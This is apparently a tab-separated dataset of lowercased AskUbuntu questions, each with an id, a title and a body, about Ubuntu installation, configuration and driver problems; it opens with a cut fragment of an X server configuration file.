: unscaled '' fontpath `` /usr/share/fonts/type1 '' fontpath `` /usr/share/fonts/cid '' fontpath `` /usr/share/fonts/speedo '' fontpath `` /usr/share/fonts/cyrillic '' fontpath `` /usr/share/fonts/artwiz-aleczapka '' fontpath `` /usr/share/fonts/ttf '' fontpath `` /usr/share/fonts/util '' fontpath `` /usr/local/share/fonts '' fontpath `` /usr/share/fonts '' fontpath `` /usr/share/fonts '' fontpath `` /usr/share/fonts/aquafont '' fontpath `` /usr/share/fonts/artwiz '' fontpath `` /usr/share/fonts/artwiz-aleczapka-en '' fontpath `` /usr/share/fonts/corefonts '' fontpath `` /usr/share/fonts/freefont '' endsection section `` module '' load `` glcore '' load `` dbe '' load `` dri '' load `` extmod '' load `` glx '' load `` pex5 '' load `` record '' load `` xie '' load `` v4l '' load `` freetype '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` keyboard '' option `` xkbmodel '' `` pc104 '' option `` xkblayout '' `` us '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` corepointer '' option `` device '' `` /dev/psaux '' option `` protocol '' `` ps/2 '' option `` emulate3buttons '' `` true '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` generic mouse '' driver `` mouse '' option `` sendcoreevents '' `` true '' option `` device '' `` /dev/input/mice '' option `` protocol '' `` imps/2 '' option `` emulate3buttons '' `` true '' option `` zaxismapping '' `` 4 5 '' endsection section `` monitor '' identifier `` laptop lcd '' vendorname `` dell '' modelname `` latitude c600 '' horizsync 31.5-48.5 vertrefresh 40-70 endsection section `` device '' identifier `` video0 '' driver `` r128 '' videoram 8192 option `` enablepageflip '' `` true '' option `` agpfastwrite '' `` true '' option `` agpmode '' `` 2 '' busid `` pci:01:00:0 '' screen 0 option `` display '' `` fp '' option `` monitorlayout '' `` crt , lfp '' endsection section `` screen '' identifier `` screen0 '' device `` video0 '' monitor `` laptop lcd '' defaultdepth 16 subsection `` display '' depth 32 modes `` 1280x1024 '' `` 1152x864 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection subsection `` display '' depth 24 modes `` 1280x1024 '' `` 1152x864 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection subsection `` display '' depth 16 modes `` 1280x1024 '' `` 1152x864 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection subsection `` display '' depth 8 modes `` 1280x1024 '' `` 1152x864 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection endsection section `` dri '' mode 0666 endsection
117512	error installing rails on ubuntu 11.10 ( gem : :dependencyerror )	i 'm trying to install ruby on rails on ubuntu 11.10 , but receiving this error : $ sudo gem install rails error : while executing gem ... ( gem : :dependencyerror ) unable to resolve dependencies : rails requires activesupport ( = 3.2.3 ) , actionpack ( = 3.2.3 ) , activerecord ( = 3.2.3 ) , activeresource ( = 3.2.3 ) , actionmailer ( = 3.2.3 ) , railties ( = 3.2.3 ) how can i fix this ? note : git ( 1.7.5.4 ) and ruby ( 1.9.2p290 ) are installed properly .
117522	emacs column editing cua mode - is it possible to select rectangular region with mouse ?	is it possible to select a column ( rectangular ) region with the mouse in emacs ? a simple yes or no will be helpful to me at this point . here are more details : column editing is possible in emacs . and it is very easy with cua-mode enabled . here are my references for this : here 's a video that shows how to do it : http : //vimeo.com/1168225 and see section `` cua rectangle support '' here : http : //www.cua.dk/cua.html but i also wonder if i can do it with the mouse . i want to select the columns entirely with the mouse ( like scite or geany can do ) . is that possible in emacs ? edit : new info . the cua-mode documentation says , there is mouse support for rectangle highlighting by dragging the mouse while holding down the shift key . the idea is that this behaves exactly like normal mouse dragging except that the region is treated as a rectangle . when i try to hold down shift and use the mouse , as soon as i click ( before i can even drag ) , i get a dialog popup . rather than paste an image of the dialog , i 'll type out what the dialog says : change default buffer face change buffer font ... increase buffer text size decrease buffer text size result to default i 'm new to emacs so i do n't recognize this dialog , and i do n't know why my shift-click action brings it up instead of doing what ( i think ) the cua-mode docs say should happen when i shift-click/drag . i 'm using kubuntu 12.04 and emacs v24 .
117524	usb device not accepting address	i have a series of machines that i am building for work that have usb card readers . when i boot them i get a long series of messages : ... [ 2347.768419 ] hub 1-6:1.0 : unable to enumerate usb device on port 6 [ 2347.968178 ] usb 1-6.6 : new full-speed usb device number 10 using ehci_hcd [ 2352.552020 ] usb 1-6.6 : device not accepting address 10 , error -32 [ 2352.568421 ] hub 1-6:1.0 : unable to enumerate usb device on port 6 [ 2352.768179 ] usb 1-6.6 : new full-speed usb device number 12 using ehci_hcd [ 2357.352033 ] usb 1-6.6 : device not accepting address 12 , error -32 ... on some older machines this only takes a few attempts before the card reader finally accepts an address , while on newer machines it can take many minutes . changing hardware is not an option and plugging the usb card reader into a different port is only an option for the older manchines . this was a problem under 11.04 and i am now running the 12.04 beta and its still happening . is there something i can do in the software ( a udev rule perhaps ? ) that would fix this ? any advice appreciated . i 'm happy to provide more details if you need them .
117525	hide grub2 menu unless you hold down shift key : how to make this happen ?	i have a ubuntu - windows 7 dual-boot set-up , and i would like to have it that my laptop would boot up windows 7 unless i press down the shift key right after boot and bring up the grub2 menu from which i can choose ubuntu . i researched on grub2 and options for etc/default/grub and i have tried playing around with combinations with the grub_timeout and grub_hidden_timeout values , but to no avail . i tried setting the grub_hidden_timeout higher than the grub_timeout thinking that both countdown start simultaneously , but no - grub_timeout only starts after the other is done . is this behavior achievable ? if so , how ?
117528	how do i install adobe acrobat pro from web premium cs4 ?	i am running the ubuntu 12.04 beta 2 , and am looking to install adobe acrobat pro from my cs4 web premium cd . whenever i try and install the setup.exe i get the following error : internal error - invalid parameters recieved . in a wine program crash box . i am running wine 1.5 and have tried 1.4 also . i have used winetricks and playonlinux , and can not get it to install with either program also if i ca n't get it installed does anyone know any programs that can link pdf files to mysql databases in linux ? i really need this to be able to host some web forms for work .
117535	4x4 workspace in gnome shell	the compiz plugin for workspaces allows you to define the grid size to use for work spaces . in gnome shell it seems that you are limited to one column that always keeps one extra workspace empty . is there anyway to configure gnome shell to use a 4x4 grid ( with or without the auto extending , i do n't care about that ) ?
117543	how to remove oracle jdk	i did n't find article any related articles how to remove oracle jdk there are some related articles but they did n't solve the problem . i installed oracle jdk tarball file from oracle site by following this article how do i install oracle java jdk 7 . it was very helpful . but i do n't what i should do to uninstall oracle jdk .
117547	err occurred using ioctl to control my network card !	recently i installed ubuntu11.10 instead of the old one in my computer . but an odd bug occurred during i used the ioctl to control my network card using the code like this : struct ifreq ifr ; int socketfd = socket ( pf_inet , sock_dgram , 0 ) ; strncpy ( ifr.ifr_name , m_ndisdevname.c_str ( ) , ifnamsiz ) ; if ( ioctl ( socketfd , siocgifflags , & ifr ) < 0 ) { cout < < `` _syncnetinfotosys device down ! ! '' < < endl ; _cleanfd ( socketfd ) ; return false ; } if ( ifr.ifr_flags |~ ( iff_up ) ) { ifr.ifr_flags |= iff_up ; ioctl ( socketfd , siocsifflags , & ifr ) ; } //set ip addr struct sockaddr_in sin ; sin.sin_family = af_inet ; sin.sin_addr.s_addr = inet_addr ( ipv4netinfo.ipaddr.c_str ( ) ) ; cout < < _syncnetinfotosys ipv4 addr ! ! '' < < ipv4netinfo.ipaddr < < endl ; memcpy ( & ifr.ifr_addr , & sin , sizeof ( struct sockaddr_in ) ) ; if ( 0 == ioctl ( socketfd , siocsifaddr , & ifr ) ) { cout < < _syncnetinfotosys set ipv4 addr succ ! ! '' < < endl ; } else { cout < < _syncipv4netinfotosys set ipv4 addr fail ! ! '' < < endl ; _cleanfd ( socketfd ) ; return false ; } ioctl always return false under the ubuntu11.10.the same code is good under the ubuntu10.04 . another odd phenomenon happened , i can reproduce the bug every time i used the code below , but after i upgrade the system and install gcc to compiler code .the bug can not be reproduced . i have contrast the depend lib in the two situation , the libc.so in two situation are different . but i replaced the newer one in the bad system , i can reproduce the bug again . i 'm confused about this ! ! ! wish someone can help me ! !
117549	error while trying to install flash plugin through software center	failed to fetch http : //archive.canonical.com/ubuntu/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.1.102.63-0oneiric1_i386.deb 404 not found [ ip : 91.189.92.191 80 ] failed to fetch http : //archive.canonical.com/ubuntu/pool/partner/a/adobe-flashplugin/adobe-flash-properties-gtk_11.1.102.63-0oneiric1_i386.deb 404 not found [ ip : 91.189.92.191 80 ]
117550	possible to make program that destroys ( scratches ) hard drive ?	warning : i 'm not intending on doing so , if possible . i know very little about hardware to software relationships , but is it possible to write a program that rapidly moves the hard drive head across the platter at a speed and force that would scratch the platter ?
117556	ubuntu 11.04 update manager doesn show any upgrades to 11.10	when i open update manager to check for new versions it doesn show the 11.10 upgrade , i 've tried also with apt-get update and it says my software is up to date . can anyone help me ? ?
117559	trigger script execution on after apt-get upgrade for a certain package ?	question : i have customized an application startup script . unfortunately , it gets overwritten every time i do apt-get dist-upgrade when there is an update available ( quite often ) . now i have written a script that makes a backup copy of the original , then modifies the original and merges my changes . now my question : how can i trigger a script execution after a package has been updated ?
117562	how do i fix “ubuntu is running in low-graphics mode ? ” for nvidia geforce gt555m	as title , i 'm using ubuntu 10.04 , and my ubuntu kept showing the sign “ubuntu is running in low-graphics mode” . i 've read another question with same topic ( http : //askubuntu.com/questions/10664/how-do-i-fix-ubuntu-is-running-in-low-graphics-mode ) , but the other one is using ati radeon x1200 . how can i fix the problem ? i 'm running ubuntu on a 200gb partition , and the rest of my computer is windows7 . my graphic card is nvidia geforce gt 555m , and my computer is acer aspire 5951g .
117565	why nautilus will open automatically when kde loads ?	recentlly every time that laptop turns on and kde loads , nautilus will opened automatically . why ? i installed kde on ubuntu 11.10 .
117566	how do i apply a custom gnome-shell theme for all users ?	i am using gnome-shell on ubuntu 11.10 . i 've found excellent theme , which i 'd like to apply to all users , current and ones that are created later . is there a way to set the new theme ( elementary luna ) as the default theme , or if not , replace the old theme completely ?
117569	how can i login to a display-less machine via ethernet ?	i have two ubuntu systems . the first i 'd like to use as a server . hence i do n't have a display or even keyboard for it . the other is my laptop and can connect to the network . upon bootup , the `` server '' will go to a lightdm login screen . first thing i 'd like to do is connect my server to my network . but since i do n't have a display for it , i 'd like to do it somehow using my laptop . is there a way i can just connect my laptop to the server using ethernet and then configure it ? first step : how do i get `` in '' , or bypass the login screen ?
117573	init.d script gets return code 1 when calling itself , how can i get output ?	my question is , how can i modify the script so that it will tell me what goes wrong ? the scenario is this : i 'm trying to get sonatype nexus to start as a service in ubuntu 10.04 , and it just will not work . ( i 'm not looking for help on how to run nexus , but on how to get some useful output from a script ) it works when invoking it with sudo /etc/init.d/nexus start but fails when using sudo service nexus start i have run the update-rc.d command on it , and done everything according to instructions . the nexus init.d-script has a point where it calls itself when it detects that it should run as another user ( 'nexus ' ) : su -m $ run_as_user -c `` \ '' $ realpath\ '' $ 2 '' which expands to su -m nexus -c ' '' /opt/nexus-2.0.2/bin/jsw/linux-x86-64/nexus '' start' when adding the -x debug flag to the script . this command results in return code 1 . it never executes - i 've set -x debug flag on the script , placed echo commands with redirect to file at the start of script to trace , etc . i can not get any output telling me why the command will not execute . i 've tried appending redirect to file after the above script line , inside the quotes , outside , any way i could imagine . all info i can get is by inserting a line echo $ ? after the su line , which outputs '1 ' . is there a way i can see what happens when the su command runs ?
117575	can not connect to local webserver	i can no longer connect to my local webserver with telnet . i get the message : `` telnet : unable to connect to remote host : no route to host '' , it used to work perfectly and i have not made any changes to either the firewall or the router , any suggestions ?
117576	bazaar issues while installing ubuntu tv	i tried to install ubuntu tv in ubuntu 12.04 with this guide : https : //wiki.ubuntu.com/ubuntutv/contributing . everything had been ok until i wrote to the terminal bzr branch lp : ~s-team/ubuntutv/trunk ubuntu-tv . it says : permission denied ( publickey ) . connectionreset reading response for 'bzrdir.open_2.1 ' , retrying permission denied ( publickey ) . bzr : error : connection closed : unexpected end of message . please check connectivity and permissions , and report a bug if problems persist .
117580	boot ubuntu on smartphone sd card ?	now here 's what i want : ubuntu on the sd card that lives in my phone . i like using ubuntu portably and my phone as a flash drive , but i have n't been able to make these work together yet . i 've tried booting off my huawei u8800 ( android 2.2 ) and nokia e66 with a micro-sd card ( with 11.10 , boots ok in a card-reader ) on an eeepc 901 without luck . the huawei does n't show up in the bios boot menu . bios sees the nokia but halts at `` boot error '' . i guess this is related to the phone 's flash drive emulation and how it handles bootsectors , but i do n't know enough about how that works to go any further . has anyone succeeded in this ?
117581	ubuntu does n't start , not enough disk space	on my computer i divided 50gb for ubuntu 11.10 i decided to install game unreal tournament 2004 deb package . after few minutes installation i have a error about `` not enough disk space '' . then i abort installation and reboot computer in windows . today i try to start my ubuntu , but after change boot os ubuntu , i see nothing . black display . then in windows programm ext2explore i saw that in linux there is no free disk space . how can i remove the packages that were installed ?
117590	can not install dsniff in 9.10 usb	ubuntu 9.10 usb pendrive everything works good even after sudo apt-get update and i try to sudo apt-get install dsniff and i get the following message : ubuntu @ ubuntu : ~ $ sudo apt-get install dsniff reading package lists ... done building dependency tree reading state information ... done e : could n't find package dsniff it 's not finding the package for some weird reason . please help i like 9.10 ubuntu and want dsniff to run on this failing to fetch packages .
117591	no animation options showing in compizconfig settings manager	this is what my `` animations '' option looks like in ccsm : it was working fine before . then i installed macbuntu , did n't like it and then uninstalled it . after that it has n't worked . how to get the animations back ?
117600	how to close notifications with the keyboard ?	my problem is that when i insert a drive ( hdd partition , dvd etc . ) a notification appears , which has a unlimited duration . clicking somewhere ( except the options ) will close this notification , but it is bothersome that i always have to use the mouse . is there a way to close these notifications with the keyboard or to set a duration ?
117602	is libreoffice writer able to read properly ms office word docx files ?	is libreoffice writer able to read properly ms office word docx files ? i think it ca n't and users should be aware of it ! i tried to open many documents .docx created with ms office 2007 and appeared modified/transformed when i tried to open them with libreoffice . can i do anything about it ?
117603	why do upgrades remove my r8168 module ?	i had terrible problems with realtek rtl8111/8168b ethernet which were solved by blacklisting the r8169 driver and instead using the r8168 driver that i downloaded from realtek . however , it seems that some updates remove the driver that i installed . why is this happening and how can i prevent it ?
117605	gnome-shell : bottom panel appearing in fullscreen	when playing a video ( with mplayer , vlc player , a flash video in firefox ) the lower panel will appear , if the bottom right edge is touched with the mouse . can i deactivate this ? or is there a workaround for this ? kind regards , hakaishi
117611	java warnings in jvm.cfg	hello i am getting warnings after i have installed java on kubuntu 11.10 . the java programs run but i always get 4 warnings : $ java warning : no leading - on line 1 of `/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/jvm.cfg' warning : missing vm type on line 1 of `/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/jvm.cfg' warning : no leading - on line 1 of `/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/jvm.cfg' warning : missing vm type on line 1 of `/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/jvm.cfg' what am i missing ? thanks in advance ! the content of the file /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/jvm.cfg is : /usr/lib/jvm/java-6-sun # # % w % % e % # # copyright ( c ) 2006 , oracle and/or its affiliates . all rights reserved . # oracle proprietary/confidential . use is subject to license terms . # # list of jvms that can be used as an option to java , javac , etc . # order is important -- first in this list is the default jvm . # note that this both this file and its format are unsupported and # will go away in a future release . # # you may also select a jvm in an arbitrary location with the # `` -xxaltjvm= < jvm_dir > '' option , but that too is unsupported # and may not be available in a future release . # -server known -client ignore -hotspot error -classic warn -native error -green error
117619	asus zenbook : how do i apply the bluetooth patch for 11.10 ?	note : there is no need for a patch if you are running ubuntu 12.04 i am following these instructions to recompile a kernel with working bluetooth for my asus zenbook ux31e . however , when typing patch -p1 linux-3.3-rc5 ./bluetooth.patch ( where linux-3.3-rc5 is the folder i unzipped the kernel ) as suggested in the 4th step , i get only an error saying : patch : **** file linux-3.3-rc5 is not a regular file -- ca n't patch am i doing something wrong ? i would really want to get bluetooth working on my laptop , otherwise ubuntu runs flawlessly on it .
117623	world of warcraft crashes when entering the game	i installed wow and it starts fine , but as soon as i enter the game it crashes instantly . this does only happen in crowded places like major cities , when i login with alts in empty places the game works fine . i have no graphic errors or anything . i 'm using a thinkpad x220 with intel hd 3000 graphics on ubuntu 12.04 beta 2 with the xorg-edgers repository enabled and updated and wine 1.4
117631	how to create init.d startup script	i just want to run a very simple command on startup . how can i do that ? i 've searched google and it has very complicated examples , but what i need is just run this script on startup . how can i do that ? script ./init.d/opscenter-agent start
117632	how can i drag and drop files into the ubuntu one bookmark in nautilus ?	i have a bookmark to my ubuntu-one folder in the sidebar of nautilus , it would seem logical that it would be possible to drag and drop files and folders on top of this bookmark and have the dropped items copied to the ubuntu-one folder to be synced to the cloud . however this does not happen , i can drop files and folders onto the shortcuts underneath `` computer '' in the nautilus sidebar but not onto anything that is a bookmark . is it possible to change this behaviour so that it is possible ? or failing that are there any possible workarounds to get a similar result ?
117633	is zeitgeist installed as part of ubuntu minimal ?	i 'm having major problems with ubuntu crashing every day so i 'd like to try something different . i tried googling for a list of packages in oneiric ubuntu minimal but could n't find anything . i 'd like to try a system that does n't have zeitgeist installed , but as it seems to be so tightly integrated into ubuntu i wondered if it was still present in the minimal version .
117634	how to edit quicklist for a mounted device in the launcher ?	i know how to add quicklists for a standard launcher with a .desktop file in either ~/.local/share/applications or /usr/share/applications . but i am trying to create a quicklist for the icon that appears when a blank disc ( cdr/dvd ) is inserted .
117635	how to install suggested packages in apt-get	i know the question has been asked before , but please hear me out . so i wanted to install screenlets . i ran sudo apt-get install screenlets , and this is what i got : the following extra packages will be installed : libart-2.0-2 libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libgnome2-0 libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libtidy-0.99-0 python-beautifulsoup python-evolution python-feedparser python-gmenu python-gnome2 python-numpy python-pyorbit python-rsvg python-tz python-utidylib screenlets-pack-basic suggested packages : libbonobo2-bin python-gnome2-doc python-numpy-doc python-numpy-dbg python-nose python-dev gfortran python-pyorbit-dbg screenlets-pack-all python-dcop recommended packages : python-numeric python-gnome2-extras the following new packages will be installed : libart-2.0-2 libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libgnome2-0 libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libtidy-0.99-0 python-beautifulsoup python-evolution python-feedparser python-gmenu python-gnome2 python-numpy python-pyorbit python-rsvg python-tz python-utidylib screenlets screenlets-pack-basic 0 upgraded , 23 newly installed , 0 to remove and 2 not upgraded . people say that recommended packages are installed by default , but they are clearly not included in the new packages that will be installed above . i also decided to include the suggested packages in the installation , so i ran sudo apt-get -- install-suggests install screenlets instead , but i got a huge list of new packages that will be installed ; that number is precisely 0 upgraded , 944 newly installed , 0 to remove and 2 not upgraded . should'nt i be getting only around 10 extra packages ?
117644	error while opening network in nautilus	what does this mean error : dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . please select another viewer and try again .
117652	ubuntu box crashes	i have a ubuntu 11.04 box running 24/7 . it started to crash any couple of days recently . i checked in kern.log , dmesg ... but did not find anything there . n is there a specific place where shutdown reason ( temperature , or whatever ) are logged ?
117658	kubuntu : how do i change an icon to .sage files which are plain text ?	i want kubuntu 11.10 to show icons on several types of plain text files - depending on the extension . the problem is - kde looks on the mime type - not on the extension . so if i do the usual way ( see the image ) all text files icons got changed - while i wanted to change icons of just .sage files .
117662	how can i get call of duty : modern warfare 2	i want to play cod : mw2 but i don ; t know how to get it on ubuntu . i am a new user so explanation would be appreciated
117663	lxde keybind `` raise '' window not working	i am using lxde* over ubuntu oneiric on a dell studio-xps 64-bit machine and i ca n't get the keybind for raising windows to work . in my ~/.config/openbox/lxde-rc.xml i put : < ! -- iconify window : it works . -- > < keybind key= '' a-down '' > < action name= '' iconify '' / > < /keybind > < ! -- raise window : does nothing . -- > < keybind key= '' a-up '' > < action name= '' focus '' / > < action name= '' raise '' / > < /keybind > then i openbox -- reconfigure , but no rasing windows keybindings . i could use the nextwindow action , but ... not really the same . references : http : //openbox.org/wiki/help : bindings http : //openbox.org/wiki/help : actions *nested question : how to know the version of installed lxde ?
117664	how to play a 3d video properly ?	i have a video in mkv format that shows two identical separate videos together , and not one over the other in vlc . on windows , i am able to play it adjusting deep , 3d mode ( red cyan , with 3d tv and its glasses thorugh hdmi ) , etc . bino does not work at all . i can only select rec cyan and it crashes on full screen . i am using ubuntu 11.10 with fully 3d support .
117668	any way for ubuntu to use more than one core of i7 cpu on my asus laptop ?	newly installed ubuntu 11.10 on a new asus u46e laptop . /proc/cpuinfo correctly identified the cpu but shows only one core : processor : 0 vendor_id : genuineintel cpu family : 6 model : 42 model name : intel ( r ) core ( tm ) i7-2640m cpu @ 2.80ghz stepping : 7 cpu mhz : 800.000 cache size : 4096 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc up arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 x2apic popcnt aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 5587.63 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : i search here and found the answer to one post suggesting remove boot parameter 'nolapic ' . however , on my particular laptop , ubuntu wo n't boot without this nolapic parameter . is there anyway for ubuntu correly utility the full cpu power ?
117670	`` enable passive mode in your ftp client '' what does it mean , and how i do it	i tried to connect to a different machine with ftp . i continually get 500 unable to service port commands ftp : bind : address already in use the solution i got was to enable passive mode in my ftp client . what does it mean , and how do i do it ?
117674	is my gedit-latex-plugin working properly ?	i have installed gedit-latex-plugin ( 0.2 rc3 ) to be used with gedit ( 2.30.3 ) in ubuntu 10.04 . if i use the command gedit file.tex & in terminal the file is opened and it seems everything works fine but in the terminal , lots of comments appear , some of which are : ****************************** 2012-03-31 22:14:27,263 debug resources - initializing resource locating 2012-03-31 22:14:27,361 debug preferences - not found 2012-03-31 22:14:27,373 debug jobmanager - created jobmanager instance 147209196 2012-03-31 22:14:27,379 debug geditlatexplugin - activate 2012-03-31 22:14:27,379 debug windowcontext - init 2012-03-31 22:14:27,444 debug geditwindowdecorator - _init_tab_decorators : initialized 0 decorators 2012-03-31 22:14:27,511 debug geditwindowdecorator - active_tab_changed 2012-03-31 22:14:27,511 debug geditwindowdecorator - -- -- -- -- -- adjust : none 2012-03-31 22:14:27,513 debug geditwindowdecorator - no window-scope views for this extension 2012-03-31 22:14:27,513 debug geditwindowdecorator - _set_selected_bottom_view : 0 2012-03-31 22:14:27,514 debug geditwindowdecorator - _set_selected_side_view : 0 2012-03-31 22:14:27,539 debug geditwindowdecorator - tab_added 2012-03-31 22:14:27,952 debug gedittabdecorator - loaded 2012-03-31 22:14:27,964 debug gedittabdecorator - _adjust_editor : uri has changed 2012-03-31 22:14:27,965 debug latexcompletionhandler - init 2012-03-31 22:14:27,966 debug languagemodelfactory - pickled object found : /home/abcd/.gnome2/gedit/plugins/geditlatexplugin/latex.pkl 2012-03-31 22:14:28,075 debug completiondistributor - init 2012-03-31 22:14:28,078 debug windowcontext - created view latexoutlineview 2012-03-31 22:14:28,078 debug windowcontext - created view issueview 2012-03-31 22:14:28,079 debug latexeditor - init ( file : ///home/abcd/dir1/file1.tex ) 2012-03-31 22:14:28,079 debug latexeditor - parsing document ... 2012-03-31 22:14:28,080 debug issueview - init 2012-03-31 22:14:28,082 debug issueview - init finished 2012-03-31 22:14:28,092 info latexeditor - latexparser.parse : 0.010000 2012-03-31 22:14:28,092 debug latexeditor - parsed 1599 bytes of content 2012-03-31 22:14:28,093 debug latexoutlineview - set_outline 2012-03-31 22:14:28,093 debug latexoutlineview - init 2012-03-31 22:14:28,097 debug latexvalidator - validate 2012-03-31 22:14:28,098 debug languagemodel - set_newcommands : 2012-03-31 22:14:28,102 debug latexeditor - parsing finished 2012-03-31 22:14:28,105 debug geditwindowdecorator - -- -- -- -- -- adjust : .tex 2012-03-31 22:14:28,119 debug geditwindowdecorator - _set_selected_bottom_view : 0 2012-03-31 22:14:28,120 debug geditwindowdecorator - _set_selected_side_view : 0 i am not sure if the gedit-latex-plugin is working properly or is it facing some problem . why are there so many debug messages ? can anybody please suggest what i should do ?
117685	trying to install bluez , says i need d-bus library ?	i 'm trying to install bluez so i can get bluetooth and anyremote working , but it keeps telling me i need a d-bus library and that i do n't have one . when i try to install glib or even look through what i have , i see that i do in fact have d-bus , so i 'm not sure what i 'm missing . i apologize if i 'm missing something completely obvious , i 'm still kind of new to ubuntu . any help would be amazing .
117693	removing ndiswrapper and inserting it back hangs os after several times	sudo modprobe -r ndiswrapper sudo modprobe ndiswrapper no matter how much time between commands . after 5-th or 6-th or 7-th iteration it hangs gui . a also can not open another tty by ctrl-alt-f1 , f2 , ... so i have to reboot . i remove and insert ndiswrapper because it helps to reconnect wi-fi if it drops . what makes my computer freeze ?
117699	removing windows and ubuntu recovery partitions ( burg )	i have ubuntu and windows installed on my computer and i 'm using burg boot loader . at the moment i have 4 entries in the boot menu , ubuntu , ubuntu recovery , windows recovery and windows . this is quite confusing and does n't look good , so i 'd prefer to have only the `` real '' os entries on the list . so how could i hide these recovery partitions ? and if i hide the ubuntu recovery entry , am i able to boot to the recovery partition somehow later if needed ? thanks
117709	delete message from jabber history in empathy 3.2	i accidentially sent a message with private information to a friend of mine on jabber ( using empathy 3.2 ) . i now want to delete this message from the history , but i can not find where empathy 3.2 stores the logs . please help me ! thank you !
117716	how can i reset the vlc interface ?	when i installed vlc on 12.04 beta 2 i accidentally picked the .xml file as the skin from the skins2 folder . i have purged vlc and reinstalled but still when i start to play a video file i hear only the sound and see the screen which is a black oblong ( no image ) of 2cm x 4cm with which i can do nothing .
117717	acer aspire 8951g nvidia optimus and hdmi issues	after loooong searches it seems that linux users are pretty much screwed when it comes to optimus . does anyone know of a workaround other than trying to flash the bios with the hack that will show an apparently `` hidden '' menu item ( on acer bios ) to disable the intel gfx in the bios ? or even better , does anyone have a flash program that will do that or some workaround ? also the intel interface is horrible . it does not allow me to choose my projector 's correct resolution either with hdmi or vga port ( even though it picks up the correct model ) . to make matters worse , the hdmi outputs junk . the graphics are unwatchably dark and i have tried to set it , but the intel interface is useless for that . it does the same in windows mode ( i dual boot ) so i suspect it may just be the port itself that 's screwy . i am running bumblebee at the moment , but that 's just for certain programs and does not allow me to do monitor configurations with the nvidia settings . can anyone point me to a useful place for an answer maybe ? my eyes are already scratchy from searching over the past 2 days .
117718	use compiz on startup , compiz -- replace bad ?	i want to run compiz on startup instead of the default window manager in the gnome classic gnome shell fallback . my problem is that i ca n't find the `` correct '' way to do this . i have tried a bunch of stuff , e.g . http : //www.jejik.com/articles/2008/10/how_to_properly_start_compiz_in_gnome/ which does n't work . the only way that have worked for me is using compiz -- replace at startup but this slows down the startup , right ? i mean , if i use the default window manager and i also have the compiz -- replace at startup , wont it cause a slower startup when both the default window manager and compiz are launched ( even though one is terminated ) ? i also have the windowmanager set to compiz in the '' desktop- > gnome- > session- > required_components '' in gconf-editor and it still does n't work . any idea how i can disable the default window manager and use compiz instead ? btw : im using ubuntu 11.10
117720	i ca n't see `` install ubuntu enterprise cloud '' options in 11.10 ?	i downloaded `` ubuntu-11.10-server-amd64.iso '' and tried to boot in vmware and install `` install ubuntu enterprise cloud '' but i ca n't see this option in first install menu ? please tell me what is problem ?
117721	wallch not auto-cycling backgrounds on log in	i 'm extremely new to ubuntu , and the linux environment in general , so i could probably be doing something stupid , or not realizing how to do it , or its working and i do n't realize it - so i just want to apologize for that in advance . going to my question , how do you make wallch cycle through the backgrounds as a background process ? currently , i have to have the actual gui for it open in order for it to actually cycle through the backgrounds . i find this highly aggravating because it entails me having to open up the program , run the background changing process , and then keep this program open . so is there any way by which wallch can auto-start the background changing process and keep this process going the entire time ? edit : to clarify this , i was always able to make wallch cycle through the backgrounds , but not as a background process . i 've been able to find out how to do this by checking out how do i create a desktop wallpaper slideshow ? . if you have it set to your launcher , you can just right-click on it and then select the `` start changing wallpapers '' button from the menu that comes up to make it run as a background process . however , i was not able to find out how to make wallch auto-start the cycling from the moment you log on , i always had to do the right-click and start whenever i log on again . so is there any way that this cycling can start from the moment i log on ?
117731	fix nautilus uris in a python script	i have a very basic python script i wrote mostly for learning purposes . it opens a terminal in the current folder . however , i ca n't get it to work in folders with accented characters in the uri ( e.g . : /home/pablo/vă­deos or /home/pablo/ărea de trabalho ) , because it looks like nautilus uris are encoded to those % { number } values . is there a way to convert these uris to normalized uris without having to translate every possible accented value by hand ?
117739	new to emacs -- my key bindings are different from what is described in the tutorials . how to fix this ?	i 'm using emacs v24 [ gnu emacs 24.0.94.1 ( x86_64-pc-linux-gnu , gtk+ version 3.3.20 ) of 2012-03-26 on meitnerium , modified by debian ] on kubuntu 12.04 . my basic problem is that emacs is not behaving the same as the tutorials i 'm reading . i either need different tutorials or i need to make my emacs work as described in the tutorials . being new to emacs and kde , i do n't know where to start because of this incongruence . my specific problem is this : when i shift-left-mouse-click , i get a buffer dialog popup . that differs from my understanding of the documenation : shift mouse-1 draws lines , rectangles or poly-lines , erases , cuts , copies or pastes . i also want to use cua mode . the cua mode documents seem to indicate that shift-left-mouse-click produces : rectangle highlighting by dragging the mouse while holding down the shift key . i do n't get that result either . in fact , i ca n't select using any modifier keys together with a drag action . maybe this is a kde issue . i do n't know .
